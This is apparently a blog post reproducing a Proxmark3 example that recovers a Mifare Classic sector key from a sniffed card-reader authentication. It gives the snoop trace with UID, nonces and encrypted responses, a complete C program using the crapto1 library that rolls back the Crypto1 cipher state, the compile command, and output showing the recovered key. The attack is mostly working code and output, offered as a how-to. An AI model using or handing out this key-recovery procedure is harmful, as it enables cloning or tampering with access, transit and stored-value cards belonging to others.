Getting the sector key of a mifare card(from google code of proxmark3)
Snooping on Mifare communications
This is a working example of how the sector keys of mifare cards can be retrieved with a Proxmark3, using the "crapto-1" package found on Google Code.
The trace below is taken from a hi14asnoop session followed by hf 14a list to get the beginning of the authentication & encryption protocol :
Commands | Comment |
+ 561882 : 1 : 26 | REQA |
+ 64 : 2 : TAG 04 00 | Answer reqa |
+ 10217 : 2 : 93 20 | Select |
+ 64 : 5 : TAG 9c 59 9b 32 6c | The card’s UID is therefore : 9c 59 9b 32 |
+ 12313 : 9 : 93 70 9c 59 9b 32 6c 6b 30 | Select with UID |
+ 64 : 3 : TAG 08 b6 dd | Tag type (Mifare 1K) |
+ 923318 : 4 : 60 00 f5 7b | AUTH (block 00) |
+ 112 : 4 : TAG 82 a4 16 6c | Tag challenge (nt, "Nonce Tag") |
+ 6985 : 8 : a1 e4 ! 58 ce ! 6e ea ! 41 e0 ! | nr XOR ks1 (Nonce Reader, encrypted, 4 bytes), ar XOR ks2 (Answer Reader to Nonce Tag, encrypted) |
+ 64 : 4 : TAG 5c ! ad f4 39 ! | at XOR ks3 (Answer Tag, encrypted) |
In order to extract the key for sector 0 from the exchange, we need the following elements :
- Tag UID
- Tag challenge (nt)
- Reader challenge, encrypted (nr xor ks1, aka nr)
- Reader response, encrypted (ar XOR ks2, aka ar)
- Tag response, encrypted (at XOR ks3, aka at)
In the example above :
- UID : 0x9c599b32
- nt : 0x82a4166c
- nr : 0xa1e458ce
- ar : 0x6eea41e0
- at : 0x5cadf439
Those can then be used in the following "crapto1" test program :
// Test-file: test2.c
#include "crapto1.h"
#include <stdio.h>
int main (void)
{
struct Crypto1State *revstate;
uint64_t lfsr;
unsigned char* plfsr = (unsigned char*)&lfsr;
uint32_t uid = 0x9c599b32;
uint32_t tag_challenge = 0x82a4166c;
uint32_t nr_enc = 0xa1e458ce;
uint32_t reader_response = 0x6eea41e0;
uint32_t tag_response = 0x5cadf439;
uint32_t ks2 = reader_response ^ prng_successor(tag_challenge, 64);
uint32_t ks3 = tag_response ^ prng_successor(tag_challenge, 96);
printf("nt': %08x\n",prng_successor(tag_challenge, 64));
printf("nt'': %08x\n",prng_successor(tag_challenge, 96));
printf("ks2: %08x\n",ks2);
printf("ks3: %08x\n",ks3);
revstate = lfsr_recovery(ks2, ks3);
lfsr_rollback(revstate, 0, 0);
lfsr_rollback(revstate, 0, 0);
lfsr_rollback(revstate, nr_enc, 1);
lfsr_rollback(revstate, uid ^ tag_challenge, 0);
crypto1_get_lfsr(revstate, &lfsr);
printf("Found Key: [%02x %02x %02x %02x %02x %02x]\n\n",plfsr[0],plfsr[1],plfsr[2],plfsr[3],plfsr[4],plfsr[5]);
return 0;
}
Then compiled with :
#gcc -o test2 test2.c crapto1.c crypto1.c
And run like this :
./test2
nt': 8d65734b
nt'': 9a427b20
ks2: e38f32ab
ks3: c6ef8f19
Found Key: [ff ff ff ff ff ff]
you can use the gui soft to do so, it is the same.
没有评论:
发表评论